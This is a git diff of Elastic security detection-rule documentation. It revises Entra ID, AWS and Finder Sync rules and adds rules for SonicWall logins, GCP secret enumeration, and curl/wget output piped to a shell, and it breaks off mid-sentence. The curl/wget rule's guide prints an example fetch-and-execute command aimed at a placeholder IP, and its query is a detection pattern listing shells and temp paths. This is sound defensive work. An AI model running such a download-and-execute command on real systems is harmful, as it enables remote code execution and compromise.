rare instances of authentication methods for Microsoft Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with an unusual method, which may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication method may not be commonly used by the user based on their historical sign-in activity. *Rule type*: new_terms @@ -20,9 +20,7 @@ Identifies rare instances of authentication requirements for Azure Entra ID prin *Maximum alerts per execution*: 100 -*References*: - -* https://securityscorecard.com/wp-content/uploads/2025/02/MassiveBotnet-Report_022125_03.pdf +*References*: None *Tags*: @@ -30,12 +28,13 @@ Identifies rare instances of authentication requirements for Azure Entra ID prin * Data Source: Azure * Data Source: Microsoft Entra ID * Data Source: Microsoft Entra ID Sign-in Logs +* Platform: Entra ID * Use Case: Identity and Access Audit * Use Case: Threat Detection * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 8 +*Version*: 9 *Rule authors*: @@ -55,21 +54,20 @@ Identifies rare instances of authentication requirements for Azure Entra ID prin *Investigating Entra ID User Sign-in with Unusual Authentication Type* -Identifies rare instances of authentication requirements for Azure Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with unusual authentication requirements, which is a rare event and may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication requirements specified may not be commonly used by the user based on their historical sign-in activity. +Identifies rare instances of authentication methods for Microsoft Entra ID principal users. An adversary with stolen credentials may attempt to authenticate with an unusual method, which may indicate an attempt to bypass conditional access policies (CAP) and multi-factor authentication (MFA) requirements. The authentication method may not be commonly used by the user based on their historical sign-in activity. -**This is a New Terms rule that focuses on first occurrence of an Entra ID principal user `azure.signinlogs.properties.user_principal_name` and their authentication requirement `azure.signinlogs.properties.authentication_requirement` in the last 14-days.** +**This is a New Terms rule that focuses on the first occurrence of an Entra ID principal user `azure.signinlogs.properties.user_principal_name` and their authentication method `azure.signinlogs.properties.authentication_details.authentication_method` in the last 14 days.** *Possible investigation steps* -- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process. -- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt. -- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. Legacy authentication methods may be more susceptible to brute-force attacks. -- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password. -- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account. -- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources. -- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. This can help identify if the failed attempts were due to policy enforcement or misconfiguration. +- Identify the source IP address by reviewing `source.ip`. Determine whether it is associated with known malicious activity, an unexpected location or hosting provider, or approved corporate infrastructure. +- Review `azure.signinlogs.properties.user_principal_name` to determine whether the account is privileged or otherwise high value, and compare the sign-in with the user's recent activity. +- Examine `azure.signinlogs.properties.authentication_details.authentication_method` and determine whether the method is expected for the user. Review recent authentication-method registration or modification events. +- Review `azure.signinlogs.properties.app_id`, `azure.signinlogs.properties.client_app_used`, and the target resource to determine whether the application and access pattern are expected. +- Examine device, browser, user-agent, authentication protocol, and token details for signs of an unfamiliar client or session. +- Review `azure.signinlogs.properties.authentication_requirement` and the applicable conditional access policies to determine why the sign-in did not require MFA. *False positive analysis* @@ -78,17 +76,16 @@ Identifies rare instances of authentication requirements for Azure Entra ID prin *Common benign scenarios* +- Users enrolling in or switching to a different authentication method may trigger this detection the first time the method is observed. - Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`. -- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`. -- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`. +- Changes to an organization's authentication or conditional access policies may cause a previously unseen authentication method to be recorded for a user. *How to reduce false positives* - Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`. -- Exlcude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication. -- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`. -- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert. +- Exclude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication. +- Correlate alerts with approved authentication-method enrollment or policy changes before adding exceptions. *Response and remediation* @@ -98,11 +95,10 @@ Identifies rare instances of authentication requirements for Azure Entra ID prin *Immediate actions* - Block the source IP address in `source.ip` if determined to be malicious. -- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies. +- If the sign-in is unauthorized, disable the affected account, revoke active sessions and tokens, and reset its credentials. - Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`. - Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks. -- Review conditional access policies to ensure they are correctly configured to block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`. -- Review Conditional Access policies to enforce risk-based authentication and block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`. +- Review conditional access policies to enforce risk-based authentication and block unauthorized access recorded in `azure.signinlogs.properties.authentication_requirement`. *Long-term mitigation* @@ -121,10 +117,11 @@ Identifies rare instances of authentication requirements for Azure Entra ID prin ---------------------------------- data_stream.dataset: "azure.signinlogs" and event.category: "authentication" and azure.signinlogs.properties.user_type: "Member" - and azure.signinlogs.properties.authentication_details.authentication_method: "Password" and not azure.signinlogs.properties.device_detail.browser: * and not source.as.organization.name: "MICROSOFT-CORP-MSN-AS-BLOCK" and not azure.signinlogs.properties.authentication_requirement: "multiFactorAuthentication" + and azure.signinlogs.properties.authentication_details.authentication_method:* + and event.outcome:success ---------------------------------- @@ -143,18 +140,6 @@ data_stream.dataset: "azure.signinlogs" and event.category: "authentication" ** ID: T1078.004 ** Reference URL: https://attack.mitre.org/techniques/T1078/004/ * Tactic: -** Name: Credential Access -** ID: TA0006 -** Reference URL: https://attack.mitre.org/tactics/TA0006/ -* Technique: -** Name: Brute Force -** ID: T1110 -** Reference URL: https://attack.mitre.org/techniques/T1110/ -* Sub-technique: -** Name: Password Spraying -** ID: T1110.003 -** Reference URL: https://attack.mitre.org/techniques/T1110/003/ -* Tactic: ** Name: Defense Evasion ** ID: TA0005 ** Reference URL: https://attack.mitre.org/tactics/TA0005/ diff --git a/docs/detections/prebuilt-rules/rule-details/entra-id-user-sign-in-with-unusual-client.asciidoc b/docs/detections/prebuilt-rules/rule-details/entra-id-user-sign-in-with-unusual-client.asciidoc index f12964bf9e..603dd95295 100644 --- a/docs/detections/prebuilt-rules/rule-details/entra-id-user-sign-in-with-unusual-client.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/entra-id-user-sign-in-with-unusual-client.asciidoc @@ -31,12 +31,13 @@ Detects rare non-interactive sign-ins where an Entra ID client application authe * Data Source: Azure * Data Source: Entra ID * Data Source: Entra ID Sign-in +* Platform: Entra ID * Use Case: Identity and Access Audit * Use Case: Threat Detection * Tactic: Initial Access * Resources: Investigation Guide -*Version*: 8 +*Version*: 9 *Rule authors*: @@ -79,6 +80,9 @@ This rule identifies rare Azure Entra apps IDs requesting authentication on-beha - User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`. - Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`. - Exclude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication. +- Microsoft Feedback Portal UX generates benign first-seen client activity through PRT-based, non-interactive sign-ins and is excluded by application ID. +- Microsoft Teams routinely requests tokens for its internal Teams Services, IC3 Gateway, Chat Aggregator, and CMD Services resources; these client-resource combinations are excluded. +- Managed Windows devices routinely request OfficeHome PRTs with Microsoft 365 Copilot scopes through the standard Microsoft 365 desktop client; this combination is excluded. - Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`. - Correlate sign-in failures with password reset events or normal user behavior before triggering an alert. @@ -190,7 +194,28 @@ data_stream.dataset: "azure.signinlogs" and event.category: "authentication" "86f4c005-6582-4559-b6cf-8b3111236736" or "a0a3c1d3-7b82-4010-bdb0-e7048fb8f1fe" or "a187e399-0c36-4b98-8f04-1edc167a0996" or - "2d4d3d8e-2be3-4bef-9f87-7875a61c29de" + "2d4d3d8e-2be3-4bef-9f87-7875a61c29de" or + "c475db56-f463-48d8-931a-cfa7cd642289" or + "71a7c376-13e6-4100-968e-92ce98c5d3d2" + ) + and not ( + azure.signinlogs.properties.app_id: "1fec8e78-bce4-4aaf-ab1b-5451cc387264" and + azure.signinlogs.properties.resource_id: ( + "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe" or + "39aaf054-81a5-48c7-a4f8-0293012095b9" or + "b1379a75-ce5e-4fa3-80c6-89bb39bf646c" or + "6bc3b958-689b-49f5-9006-36d165f30e00" + ) + ) + and not ( + azure.signinlogs.properties.app_id: "4765445b-32c6-49b0-83e6-1d93765276ca" and + azure.signinlogs.properties.resource_id: "4765445b-32c6-49b0-83e6-1d93765276ca" and + azure.signinlogs.properties.authentication_processing_details: *M365Copilot.Read.All* and + azure.signinlogs.properties.incoming_token_type: "primaryRefreshToken" and + azure.signinlogs.properties.client_app_used: "Mobile Apps and Desktop clients" and + azure.signinlogs.properties.device_detail.is_managed: true and + azure.signinlogs.properties.device_detail.operating_system: "Windows10" and + user_agent.original: Mozilla*Edge/18.* ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/entra-id-user-sign-in-with-unusual-non-managed-device.asciidoc b/docs/detections/prebuilt-rules/rule-details/entra-id-user-sign-in-with-unusual-non-managed-device.asciidoc index 6a227e2b98..d47f57b9bd 100644 --- a/docs/detections/prebuilt-rules/rule-details/entra-id-user-sign-in-with-unusual-non-managed-device.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/entra-id-user-sign-in-with-unusual-non-managed-device.asciidoc @@ -35,9 +35,10 @@ Identifies when a Microsoft Entra ID user signs in from a device that is not typ * Data Source: Azure * Data Source: Microsoft Entra ID * Data Source: Microsoft Entra ID Sign-in Logs +* Platform: Entra ID * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -77,6 +78,8 @@ This rule detects when a Microsoft Entra ID user signs in from a device that is - Legitimate users may sign in from new devices, such as when using a new laptop or mobile device. If this is expected behavior, consider adjusting the rule or adding exceptions for specific users or device IDs. - Environments where users frequently change devices, such as in a corporate setting with rotating hardware, may generate false positives. - Users may use both an endpoint and mobile device for sign-ins, which could trigger this rule. +- Hybrid Azure AD joined devices often report `is_managed: false` when Intune MDM is not enrolled; that corporate hybrid-join state is excluded. Azure AD joined devices are kept in scope because OAuth phishing / ROADtx device registration commonly creates cloud-joined (not hybrid) unmanaged devices. +- Non-interactive sign-ins with `azure.signinlogs.properties.incoming_token_type` of `"none"` (common Microsoft first-party background token acquisition on registered devices) are excluded; `"primaryRefreshToken"` (PRT) and `"refreshToken"` activity remain in scope. *Response and remediation* @@ -110,6 +113,8 @@ data_stream.dataset: "azure.signinlogs" and azure.signinlogs.properties.token_protection_status_details.sign_in_session_status: "unbound" and not azure.signinlogs.properties.device_detail.is_managed: true and not azure.signinlogs.properties.device_detail.device_id: "" and + not azure.signinlogs.properties.device_detail.trust_type: "Hybrid Azure AD joined" and + not (azure.signinlogs.category: "NonInteractiveUserSignInLogs" and azure.signinlogs.properties.incoming_token_type: "none") and azure.signinlogs.properties.user_principal_name: * ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/file-downloaded-by-curl-wget-and-piped-to-interpreter.asciidoc b/docs/detections/prebuilt-rules/rule-details/file-downloaded-by-curl-wget-and-piped-to-interpreter.asciidoc new file mode 100644 index 0000000000..613614b310 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/file-downloaded-by-curl-wget-and-piped-to-interpreter.asciidoc @@ -0,0 +1,204 @@ +[[file-downloaded-by-curl-wget-and-piped-to-interpreter]] +=== File Downloaded by Curl/Wget and Piped to Interpreter + +This rule detects when a file is downloaded by curl or wget, and piped to an interpreter. Attackers may use this technique to download and execute payloads for various malicious purposes, such as establishing persistence or exfiltrating data. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.process* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Tactic: Command and Control +* Tactic: Defense Evasion +* Data Source: Elastic Defend +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + ## Triage and analysis + +> **Disclaimer**: +> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs. + + +*Investigating File Downloaded by Curl/Wget and Piped to Interpreter* + + +This rule identifies Linux activity where curl or wget retrieves content from a remote path and sends it directly to a shell or scripting interpreter, enabling code execution without first saving a conventional file. An attacker may run `curl http://203.0.113.10/payload | sh` to execute a staged payload and rapidly establish persistence or launch data theft. + + +*Possible investigation steps* + + +- Reconstruct the complete process ancestry and descendants to identify the initiating user, access vector, executed commands, and any follow-on payloads. +- Extract the remote URL, resolve redirects, assess domain and IP reputation, and safely retrieve the content for hashing, static analysis, and sandbox execution. +- Correlate DNS, proxy, firewall, and endpoint network telemetry to confirm the connection, transferred bytes, related destinations, and other affected hosts. +- Examine the host for persistence, dropped files, credential access, privilege escalation, account changes, or suspicious outbound connections occurring after the alert. +- Confirm whether the activity was authorized by the user or system owner, and isolate the host, block indicators, and revoke exposed credentials if malicious intent is established. + + +*False positive analysis* + + +- An administrator may use curl or wget to stream an approved installation or configuration script into a shell during deployment; verify the initiating account, change record, remote destination, and retrieved script contents. +- An automated Linux provisioning or maintenance task may fetch and execute a trusted script through an interpreter; confirm the process ancestry, expected schedule, command line, destination ownership, and consistency across authorized hosts. + + +*Response and remediation* + + +- Isolate the affected Linux host from the network while preserving volatile evidence, running processes, shell history, downloaded content, and relevant system logs. +- Block the malicious URL, domain, IP address, and payload hashes across DNS, proxy, firewall, endpoint, and email controls, and identify other hosts that contacted the same infrastructure. +- Terminate malicious processes and remove associated persistence from cron jobs, systemd units, shell profiles, startup scripts, SSH authorized keys, modified accounts, and files in locations such as `/tmp`, `/var/tmp`, and `/dev/shm`. +- Escalate immediately to incident response if privileged execution, credential theft, lateral movement, data exfiltration, or the same indicators on multiple hosts are identified, and rotate affected passwords, keys, tokens, and secrets. +- Reimage the system or restore it from a verified known-good image, validate package and configuration integrity, apply security updates, and monitor closely for renewed connections or execution. +- Prevent recurrence by restricting outbound access, allowlisting approved download sources, limiting curl and wget use for service accounts, and alerting on streamed interpreter execution and executables launched from temporary or memory-backed paths. + + +==== Setup + + + +*Setup* + + +This rule requires data coming in from Elastic Defend. + + +*Elastic Defend Integration Setup* + +Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app. + + +*Prerequisite Requirements:* + +- Fleet is required for Elastic Defend. +- To configure Fleet Server refer to the https://www.elastic.co/guide/en/fleet/current/fleet-server.html[documentation]. + + +*The following steps should be executed in order to add the Elastic Defend integration on a Linux System:* + +- Go to the Kibana home page and click "Add integrations". +- In the query bar, search for "Elastic Defend" and select the integration to see more details about it. +- Click "Add Elastic Defend". +- Configure the integration name and optionally add a description. +- Select the type of environment you want to protect, either "Traditional Endpoints" or "Cloud Workloads". +- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html[Helper guide]. +- We suggest selecting "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" +- Enter a name for the agent policy in "New agent policy name". If other agent policies already exist, you can click the "Existing hosts" tab and select an existing policy instead. +For more details on Elastic Agent configuration settings, refer to the https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html[helper guide]. +- Click "Save and Continue". +- To complete the integration, select "Add Elastic Agent to your hosts" and continue to the next section to install the Elastic Agent on your hosts. +For more details on Elastic Defend refer to the https://www.elastic.co/guide/en/security/current/install-endpoint.html[helper guide]. + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by host.id, process.parent.entity_id, process.working_directory with maxspan=1s + [process where host.os.type == "linux" and event.type == "start" and event.action == "exec" and process.name in ("curl", "wget") and + ( + /* IP address and path */ + process.command_line regex ".*[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}(:[0-9]{1,5})?\\/[^ ]+.*" or + /* URL and path */ + process.command_line regex ".*[A-Za-z0-9][A-Za-z0-9\\-]*(\\.[A-Za-z0-9][A-Za-z0-9\\-]*)+(:[0-9]{1,5})?\\/[^ ]+.*" + ) and + process.args_count <= 3 and ( + process.parent.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "busybox", "node", "deno", "ash", "mksh", "pwsh") or + process.parent.name like (".*", "python*", "perl*", "ruby*", "lua*", "php*") or + process.parent.executable like ( + "/tmp/*", "/var/tmp/*", "/dev/shm/*", "./*", "/run/*", "/var/run/*", "/boot/*", "/sys/*", "/lost+found/*", + "/proc/*", "/var/mail/*", "/var/www/*", "/dev/fd/*", "?memfd:*", "memfd:*" + ) + ) and + not ( + process.args in ("-h", "--help", "-V", "--version", "--output", "-O") or + process.args like ("--output*", "-o*", "--remote-name*") or + process.command_line like ("*127.0.0.1*", "*localhost*", "*artifacts.elastic.co*", "*ela.st*", "*elastic.co*") + )] + [process where host.os.type == "linux" and event.type == "end" and event.action == "end" and + process.name like ( + "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", + "python*", "perl*", "ruby*", "lua*", "php*", "node" + ) and process.args_count == 1 and + process.args like ( + "-bash", "-dash", "-sh", "-tcsh", "-csh", "-zsh", "-ksh", "-fish", "-ash", "-mksh", "-pwsh", + "bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "ash", "mksh", "pwsh", + "/bin/bash", "/bin/dash", "/bin/sh", "/bin/tcsh", + "/bin/zsh", "/bin/ksh", "/bin/fish", + "/bin/csh", "/bin/ash", "/bin/mksh", "/bin/pwsh", + "/usr/bin/bash", "/usr/bin/dash", "/usr/bin/sh", "/usr/bin/tcsh", + "/usr/bin/csh", "/usr/bin/zsh", "/usr/bin/ksh", "/usr/bin/fish", + "/usr/bin/ash", "/usr/bin/mksh", "/usr/bin/pwsh", + "/usr/local/bin/bash", "/usr/local/bin/dash", "/usr/local/bin/sh", "/usr/local/bin/tcsh", + "/usr/local/bin/csh", "/usr/local/bin/zsh", "/usr/local/bin/ksh", "/usr/local/bin/fish", + "/usr/local/bin/ash", "/usr/local/bin/mksh", "/usr/local/bin/pwsh", + "python*", "/bin/python*", "/usr/bin/python*", "/usr/local/bin/python*", + "perl*", "/bin/perl*", "/usr/bin/perl*", "/usr/local/bin/perl*", + "ruby*", "/bin/ruby*", "/usr/bin/ruby*", "/usr/local/bin/ruby*", + "lua*", "/bin/lua*", "/usr/bin/lua*", "/usr/local/bin/lua*", + "php*", "/bin/php*", "/usr/bin/php*", "/usr/local/bin/php*", + "node", "/bin/node", "/usr/bin/node", "/usr/local/bin/node", + "/dev/fd/*", "?memfd:*", "memfd:*" + ) + ] + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: Unix Shell +** ID: T1059.004 +** Reference URL: https://attack.mitre.org/techniques/T1059/004/ +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Application Layer Protocol +** ID: T1071 +** Reference URL: https://attack.mitre.org/techniques/T1071/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ diff --git a/docs/detections/prebuilt-rules/rule-details/finder-sync-plugin-registered-and-enabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/finder-sync-plugin-registered-and-enabled.asciidoc index 1745dc9369..6432d9ba5d 100644 --- a/docs/detections/prebuilt-rules/rule-details/finder-sync-plugin-registered-and-enabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/finder-sync-plugin-registered-and-enabled.asciidoc @@ -32,11 +32,12 @@ Finder Sync plugins enable users to extend Finder’s functionality by modifying * Data Source: Elastic Defend * Resources: Investigation Guide -*Version*: 212 +*Version*: 213 *Rule authors*: * Elastic +* Massimo Bertocchi *Rule license*: Elastic License v2 diff --git a/docs/detections/prebuilt-rules/rule-details/first-seen-sonicwall-remote-access-login-by-user-and-source.asciidoc b/docs/detections/prebuilt-rules/rule-details/first-seen-sonicwall-remote-access-login-by-user-and-source.asciidoc new file mode 100644 index 0000000000..b3d93335a6 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/first-seen-sonicwall-remote-access-login-by-user-and-source.asciidoc @@ -0,0 +1,129 @@ +[[first-seen-sonicwall-remote-access-login-by-user-and-source]] +=== First Seen SonicWall Remote Access Login by User and Source + +Identifies a successful SonicWall VPN- or WAN-zone administrator or remote-user login from a source IP that was not previously observed with the same user on the same appliance during the prior 14 days. This may indicate stolen credentials, compromised administrator access, or unauthorized remote access. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-sonicwall_firewall.log-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/docs/reference/integrations/sonicwall_firewall +* https://www.sonicwall.com/support/knowledge-base/monitoring-sslvpn-user-logins/kA1VN0000000JQz0AM +* https://www.huntress.com/blog/sonicwall-credential-stuffing-campaign + +*Tags*: + +* Domain: Network +* Domain: Identity +* Use Case: Threat Detection +* Use Case: Identity and Access Audit +* Tactic: Initial Access +* Data Source: SonicWall Firewall Logs +* Rule Type: New Terms +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating First Seen SonicWall Remote Access Login by User and Source* + + +This rule detects a newly observed combination of SonicWall appliance serial number, user name, and source IP for a +successful VPN- or WAN-zone login. Event IDs `235` and `236` are administrator logins from VPN and WAN zones, `237` and +`238` are remote-user logins from VPN and WAN zones, and `1080` is a successful SSL VPN user login. + + +*Possible investigation steps* + + +- Confirm the user, source IP, appliance, login type, VPN policy, MFA result, and assigned tunnel address. +- Review the source geolocation, reputation, and prior authentication activity. +- Correlate with failed logins, configuration changes, internal reconnaissance, and endpoint activity. +- Prefer exceptions scoped to the appliance, user, and expected source rather than globally excluding an identity. + + +*False positive analysis* + + +- Validate new users, travel, ISP address changes, managed service provider activity, and integration onboarding before + treating the alert as unauthorized access. + + +*Response and remediation* + + +- If unauthorized access is suspected, terminate active sessions, disable the affected account, rotate credentials and + tokens, verify MFA, and review downstream activity from the assigned tunnel address. +- Preserve SonicWall authentication, VPN session, and configuration audit logs before making broad changes. + + +==== Setup + + + +*Setup* + + +This rule requires the Elastic SonicWall Firewall integration and SonicWall Enhanced Syslog authentication events. +Configure the appliance to forward **Users > Authentication Access** events, including event IDs `235`, `236`, `237`, +`238`, and `1080`. Verify that the integration populates `data_stream.dataset`, `event.action`, `event.code`, +`source.ip`, `user.name`, and `observer.serial_number`. + +The new-terms key requires `observer.serial_number`. Events without that field do not match. Ensure serial numbers are +stable and unique across tenants in a shared Kibana space. + + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset:"sonicwall_firewall.log" and + event.action:"login-success" and + event.code:("235" or "236" or "237" or "238" or "1080") and + source.ip:* and user.name:* and observer.serial_number:* + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Initial Access +** ID: TA0001 +** Reference URL: https://attack.mitre.org/tactics/TA0001/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Technique: +** Name: External Remote Services +** ID: T1133 +** Reference URL: https://attack.mitre.org/techniques/T1133/ diff --git a/docs/detections/prebuilt-rules/rule-details/first-time-aws-cloudformation-stack-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/first-time-aws-cloudformation-stack-creation.asciidoc index 9661333cef..b2a4cae8dc 100644 --- a/docs/detections/prebuilt-rules/rule-details/first-time-aws-cloudformation-stack-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/first-time-aws-cloudformation-stack-creation.asciidoc @@ -28,14 +28,14 @@ This rule detects the first time a principal calls AWS CloudFormation CreateStac *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: CloudFormation -* Use Case: Asset Visibility +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS CloudFormation * Tactic: Execution +* Rule Type: New Terms * Resources: Investigation Guide -*Version*: 8 +*Version*: 9 *Rule authors*: @@ -97,6 +97,7 @@ AWS CloudFormation automates the setup of cloud resources using templates, strea data_stream.dataset:aws.cloudtrail and event.provider:cloudformation.amazonaws.com and event.action: (CreateStack or CreateStackInstances) and event.outcome:success + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc b/docs/detections/prebuilt-rules/rule-details/first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc index 90f5e7fa9f..6745184cb8 100644 --- a/docs/detections/prebuilt-rules/rule-details/first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/first-time-seen-aws-secret-value-accessed-in-secrets-manager.asciidoc @@ -30,13 +30,14 @@ An adversary with access to a compromised AWS service such as an EC2 instance, L *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS Secrets Manager +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Secrets Manager * Tactic: Credential Access +* Rule Type: New Terms * Resources: Investigation Guide -*Version*: 319 +*Version*: 320 *Rule authors*: @@ -117,6 +118,8 @@ data_stream.dataset: aws.cloudtrail and event.provider: secretsmanager.amazonaws.com and event.action: GetSecretValue and event.outcome: success + and not user_agent.original: *Fargate* + and not user.id: AWSServiceRole* ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/gcp-secret-manager-listsecrets-across-multiple-projects.asciidoc b/docs/detections/prebuilt-rules/rule-details/gcp-secret-manager-listsecrets-across-multiple-projects.asciidoc new file mode 100644 index 0000000000..cf7aa20266 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/gcp-secret-manager-listsecrets-across-multiple-projects.asciidoc @@ -0,0 +1,152 @@ +[[gcp-secret-manager-listsecrets-across-multiple-projects]] +=== GCP Secret Manager ListSecrets Across Multiple Projects + +Detects a single identity listing Google Cloud Secret Manager secrets across many distinct projects in a short window. ListSecrets does not return secret values, but sweeping many projects is a common reconnaissance step before targeted AccessSecretVersion calls. Legitimate workloads typically list secrets within one project or a small set of projects; cross-project bursts from one user and source IP are uncommon outside security tooling or compromise. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://cloud.google.com/secret-manager/docs/reference/rest/v1/projects.secrets/list + +*Tags*: + +* Domain: Cloud +* Data Source: GCP +* Data Source: Google Cloud Platform +* Data Source: GCP Audit Logs +* Use Case: Threat Detection +* Tactic: Discovery +* Resources: Investigation Guide +* Rule Type: ESQL +* Platform: GCP +* Service: GCP Secret Manager + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating GCP Secret Manager ListSecrets Across Multiple Projects* + + +This rule aggregates Secret Manager `ListSecrets` audit events per `client.user.email` and `source.ip` over the rule +lookback. It alerts when the same actor lists secrets in 10 or more distinct `cloud.project.id` values. Listing does +not retrieve secret payloads, but multi-project enumeration is a strong discovery signal ahead of credential access. + + +*Possible investigation steps* + + +- Review `Esql.cloud_project_id_values` to identify which projects were + enumerated and whether they include high-value or production workloads. +- Confirm whether `client.user.email`, `source.ip`, and + `Esql.user_agent_original_values` match expected administrators, CI/CD, or approved security scanners. +- Check `Esql.event_outcome_values` for mixed success and failure, which can indicate permission probing across projects + the identity cannot fully access. +- Hunt for follow-on Secret Manager activity from the same identity or IP, especially + `AccessSecretVersion`, `GetSecret`, and IAM policy changes on secrets or projects. +- Bound the 